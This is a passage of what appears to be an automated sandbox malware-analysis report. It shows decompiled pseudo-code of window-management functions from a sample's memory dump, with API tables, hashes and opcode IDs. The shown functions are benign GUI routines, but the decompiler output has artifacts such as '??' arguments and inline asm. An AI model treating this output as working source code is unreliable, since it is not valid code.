								_push(0x44ed90);
								__eflags = 0;
								E00425CE8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00407730();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0042572C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E00425CE8(_v24, _v32);
									E00425B88(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44eeae);
									__eflags = 0;
									E00425CE8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E0041AC6C(_v8, _t373);
											__eflags = 0;
											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x49de0c; // 0x49ebbc
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x49de0c; // 0x49ebbc
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x49dbcc; // 0x49ebb8
												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0045AD1C();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00407540();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44ef7a);
								return E004049C0( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                    0x0044ea41
                                                    0x0044ea43
                                                    0x0044ea4b
                                                    0x0044ea4e
                                                    0x0044ea50
                                                    0x0044ea55
                                                    0x0044ea56
                                                    0x0044ea5b
                                                    0x0044ea5e
                                                    0x0044ea61
                                                    0x0044ea63
                                                    0x0044ea68
                                                    0x0044ea8a
                                                    0x0044ea8a
                                                    0x0044ea8f
                                                    0x0044eade
                                                    0x0044eadf
                                                    0x0044eae1
                                                    0x00000000
                                                    0x0044eae7
                                                    0x0044eae7
                                                    0x0044eae8
                                                    0x0044eae8
                                                    0x0044eaea
                                                    0x0044eaf7
                                                    0x0044eafc
                                                    0x0044eafe
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb04
                                                    0x0044eb05
                                                    0x0044eb05
                                                    0x0044eb06
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb06
                                                    0x0044eaea
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea94
                                                    0x0044eb0d
                                                    0x0044eb11
                                                    0x0044eb15
                                                    0x0044eb17
                                                    0x0044eb17
                                                    0x0044eb21
                                                    0x0044eb22
                                                    0x0044eb24
                                                    0x0044eb9a
                                                    0x0044eb9a
                                                    0x0044eba3
                                                    0x00000000
                                                    0x0044eb26
                                                    0x0044eb26
                                                    0x0044eb27
                                                    0x0044eb27
                                                    0x0044eb29
                                                    0x0044eb29
                                                    0x0044eb2d
                                                    0x0044eb53
                                                    0x0044eb2f
                                                    0x0044eb2f
                                                    0x0044eb32
                                                    0x0044eb34
                                                    0x0044eb46
                                                    0x0044eb36
                                                    0x0044eb41
                                                    0x0044eb41
                                                    0x0044eb34
                                                    0x0044eb5b
                                                    0x0044eb60
                                                    0x0044eb6b
                                                    0x0044eb6e
                                                    0x0044eb72
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb96
                                                    0x0044eb97
                                                    0x0044eb97
                                                    0x0044eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb98
                                                    0x0044eb7d
                                                    0x0044eb85
                                                    0x0044eb8c
                                                    0x0044eb8c
                                                    0x0044ea96
                                                    0x0044ea96
                                                    0x0044ea97
                                                    0x0044ef00
                                                    0x0044ef01
                                                    0x0044ef03
                                                    0x00000000
                                                    0x0044ef05
                                                    0x0044ef05
                                                    0x0044ef06
                                                    0x0044ef06
                                                    0x0044ef08
                                                    0x0044ef12
                                                    0x0044ef1a
                                                    0x0044ef1d
                                                    0x0044ef20
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef2a
                                                    0x0044ef2f
                                                    0x0044ef31
                                                    0x0044ef3f
                                                    0x0044ef40
                                                    0x0044ef40
                                                    0x0044ef41
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef31
                                                    0x0044ef38
                                                    0x0044ef38
                                                    0x0044ea9d
                                                    0x00000000
                                                    0x0044ea9d
                                                    0x0044ea97
                                                    0x0044ea94
                                                    0x00000000
                                                    0x0044ea6a
                                                    0x0044ea6a
                                                    0x0044eaa8
                                                    0x0044eaa9
                                                    0x0044eaab
                                                    0x00000000
                                                    0x0044eab1
                                                    0x0044eab1
                                                    0x0044eab2
                                                    0x0044eab2
                                                    0x0044eab4
                                                    0x0044eab9
                                                    0x0044eac2
                                                    0x0044eac7
                                                    0x0044eac9
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eacf
                                                    0x0044ead0
                                                    0x0044ead0
                                                    0x0044ead1
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead1
                                                    0x0044eab4
                                                    0x00000000
                                                    0x0044ea6c
                                                    0x0044ea6c
                                                    0x0044ea6f
                                                    0x0044ecb2
                                                    0x0044ecbb
                                                    0x0044ecbc
                                                    0x0044ecbe
                                                    0x00000000
                                                    0x0044ecc4
                                                    0x0044ecc4
                                                    0x0044ecc5
                                                    0x0044ecc5
                                                    0x0044ecc7
                                                    0x0044ecde
                                                    0x0044ece1
                                                    0x0044ece5
                                                    0x00000000
                                                    0x00000000
                                                    0x0044edad
                                                    0x0044edae
                                                    0x0044edae
                                                    0x0044edaf
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edaf
                                                    0x0044ecf7
                                                    0x0044ecfc
                                                    0x0044ecfd
                                                    0x0044ed02
                                                    0x0044ed05
                                                    0x0044ed14
                                                    0x0044ed19
                                                    0x0044ed1a
                                                    0x0044ed1f
                                                    0x0044ed22
                                                    0x0044ed2e
                                                    0x0044ed43
                                                    0x0044ed5c
                                                    0x0044ed63
                                                    0x0044ed66
                                                    0x0044ed69
                                                    0x0044ed6e
                                                    0x0044ed73
                                                    0x0044ed88
                                                    0x0044ed88
                                                    0x0044ea75
                                                    0x0044ea75
                                                    0x0044ea76
                                                    0x0044edbd
                                                    0x0044edc6
                                                    0x0044edc7
                                                    0x0044edc9
                                                    0x00000000
                                                    0x0044edcf
                                                    0x0044edcf
                                                    0x0044edd0
                                                    0x0044edd0
                                                    0x0044edd2
                                                    0x0044ede9
                                                    0x0044edec
                                                    0x0044edf0
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eef0
                                                    0x0044eef1
                                                    0x0044eef1
                                                    0x0044eef2
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef2
                                                    0x0044edf9
                                                    0x0044edfd
                                                    0x0044ee02
                                                    0x0044ee10
                                                    0x0044ee1f
                                                    0x0044ee2d
                                                    0x0044ee39
                                                    0x0044ee47
                                                    0x0044ee50
                                                    0x0044ee65
                                                    0x0044ee7f
                                                    0x0044ee84
                                                    0x0044ee87
                                                    0x0044ee8a
                                                    0x0044ee8f
                                                    0x0044ee94
                                                    0x0044eea6
                                                    0x0044eea6
                                                    0x0044ea7c
                                                    0x0044ea7f
                                                    0x0044ebb0
                                                    0x0044ebb9
                                                    0x0044ebba
                                                    0x0044ebbc
                                                    0x00000000
                                                    0x0044ebc2
                                                    0x0044ebc2
                                                    0x0044ebc3
                                                    0x0044ebc3
                                                    0x0044ebc5
                                                    0x0044ebd1
                                                    0x0044ebd4
                                                    0x0044ebd7
                                                    0x0044ebda
                                                    0x0044ec05
                                                    0x0044ebdc
                                                    0x0044ebe9
                                                    0x0044ebe9
                                                    0x0044ec08
                                                    0x0044ec0c
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eca2
                                                    0x0044eca3
                                                    0x0044eca3
                                                    0x0044eca4
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044eca4
                                                    0x0044ec24
                                                    0x0044ec29
                                                    0x0044ec2b
                                                    0x0044ec32
                                                    0x0044ec3d
                                                    0x0044ec3f
                                                    0x0044ec3f
                                                    0x0044ec44
                                                    0x0044ec4c
                                                    0x0044ec4f
                                                    0x0044ec51
                                                    0x0044ec57
                                                    0x0044ec59
                                                    0x0044ec60
                                                    0x0044ec60
                                                    0x0044ec66
                                                    0x0044ec6c
                                                    0x0044ec73
                                                    0x0044ec8f
                                                    0x0044ec98
                                                    0x0044ec75
                                                    0x0044ec85
                                                    0x0044ec85
                                                    0x0044ec73
                                                    0x0044ec51
                                                    0x0044ea85
                                                    0x0044ef43
                                                    0x0044ef46
                                                    0x0044ef4a
                                                    0x0044ef4d
                                                    0x0044ef51
                                                    0x0044ef54
                                                    0x0044ef55
                                                    0x0044ef5a
                                                    0x0044ef5a
                                                    0x0044ef5d
                                                    0x0044ef5f
                                                    0x0044ef62
                                                    0x0044ef65
                                                    0x0044ef72
                                                    0x0044ef72
                                                    0x0044ea76
                                                    0x0044ea6f
                                                    0x0044ea6a
                                                    0x00000000

                                                    APIs
                                                    • SaveDC.GDI32(?), ref: 0044ED0F
                                                    • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                    • 733AB080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                    • SaveDC.GDI32(?), ref: 0044EE34
                                                    • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: RestoreSave$B080NtdllProc_Window
                                                    • String ID: LbC
                                                    • API String ID: 4024241980-1054848185
                                                    • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                    • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A104 Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E0045A104(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045906C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407540();
						}
					}
					_t26 =  *0x49d970; // 0x49e900
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x49d970; // 0x49e900
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00454D78(_t36, 0);
						E00457194( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0045974C(_t51);
					_t21 =  *0x49ebbc; // 0x0
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E00441704(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                                    0x0045a106
                                                    0x0045a10c
                                                    0x0045a113
                                                    0x0045a11d
                                                    0x0045a126
                                                    0x0045a160
                                                    0x0045a168
                                                    0x0045a137
                                                    0x0045a145
                                                    0x0045a147
                                                    0x00000000
                                                    0x0045a149
                                                    0x0045a149
                                                    0x0045a14b
                                                    0x0045a150
                                                    0x0045a158
                                                    0x0045a159
                                                    0x0045a159
                                                    0x0045a147
                                                    0x0045a175
                                                    0x0045a17e
                                                    0x0045a180
                                                    0x0045a182
                                                    0x0045a182
                                                    0x0045a188
                                                    0x0045a191
                                                    0x0045a193
                                                    0x0045a195
                                                    0x0045a195
                                                    0x0045a19f
                                                    0x0045a1a4
                                                    0x0045a1a9
                                                    0x0045a1bc
                                                    0x0045a1c4
                                                    0x0045a1c4
                                                    0x0045a1cb
                                                    0x0045a1d0
                                                    0x0045a1d5
                                                    0x0045a1da
                                                    0x0045a1e4
                                                    0x0045a1e4
                                                    0x0045a1f1
                                                    0x00000000
                                                    0x0045a1fb
                                                    0x0045a1f1
                                                    0x0045a203

                                                    APIs
                                                    • IsIconic.USER32(?), ref: 0045A10C
                                                    • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                    • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3996302123-0
                                                    • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                    • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004410F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00441A08(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00441A08(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043A91C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0043A5D0(_t52);
						return E00403DE8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                    0x004410f9
                                                    0x004410fb
                                                    0x004410fd
                                                    0x00441102
                                                    0x0044111d
                                                    0x00441126
                                                    0x00441154
                                                    0x00441154
                                                    0x00441157
                                                    0x0044115d
                                                    0x00441163
                                                    0x00441168
                                                    0x0044116d
                                                    0x0044116f
                                                    0x00441171
                                                    0x00441183
                                                    0x0044118d
                                                    0x00441198
                                                    0x00441199
                                                    0x0044119a
                                                    0x0044119b
                                                    0x004411a7
                                                    0x004411a7
                                                    0x004411ac
                                                    0x004411ae
                                                    0x00000000
                                                    0x004411b9
                                                    0x0044112f
                                                    0x00441134
                                                    0x00441136
                                                    0x00000000
                                                    0x00000000
                                                    0x0044114d
                                                    0x00000000
                                                    0x00441111
                                                    0x00441111
                                                    0x00441117
                                                    0x004411c4
                                                    0x004411c4
                                                    0x00000000
                                                    0x00441117

                                                    APIs
                                                    • IsIconic.USER32(?), ref: 0044112F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID: ,
                                                    • API String ID: 568898626-3772416878
                                                    • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                    • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                    0x0045a056
                                                    0x0045a058
                                                    0x0045a05c
                                                    0x0045a063
                                                    0x0045a06b
                                                    0x0045a070
                                                    0x0045a074
                                                    0x0045a07d
                                                    0x0045a0e1
                                                    0x0045a0e4
                                                    0x0045a0a0
                                                    0x0045a0a4
                                                    0x0045a0b6
                                                    0x0045a0bc
                                                    0x0045a0c0
                                                    0x0045a0c5
                                                    0x0045a0c7
                                                    0x0045a0cc
                                                    0x0045a0d1
                                                    0x0045a0d1
                                                    0x0045a0d4
                                                    0x0045a0d5
                                                    0x0045a0d5
                                                    0x0045a0f1
                                                    0x00000000
                                                    0x0045a0fb
                                                    0x0045a0f1
                                                    0x0045a103

                                                    APIs
                                                    • IsIconic.USER32(00000000), ref: 0045A05C
                                                    • SetActiveWindow.USER32(00000000,?,?,0045A790), ref: 0045A074
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                    • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,?,?,0045A790), ref: 0045A0D5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 1720852555-0
                                                    • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                    • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C6FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x49e929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042C66C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x49e904; // 0x42c6fc
				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
				return  *0x49e904(_t23, _t19);
			}










                                                    0x0042c704
                                                    0x0042c707
                                                    0x0042c711
                                                    0x0042c73b
                                                    0x0042c74c
                                                    0x0042c75f
                                                    0x0042c74e
                                                    0x0042c753
                                                    0x0042c753
                                                    0x00000000
                                                    0x0042c769
                                                    0x00000000
                                                    0x0042c73d
                                                    0x0042c718
                                                    0x0042c725
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: MonitorFromWindow
                                                    • API String ID: 190572456-2842599566
                                                    • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                    • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042E3B4 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E0042E3B4(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x49ea48; // 0x22f0dc8
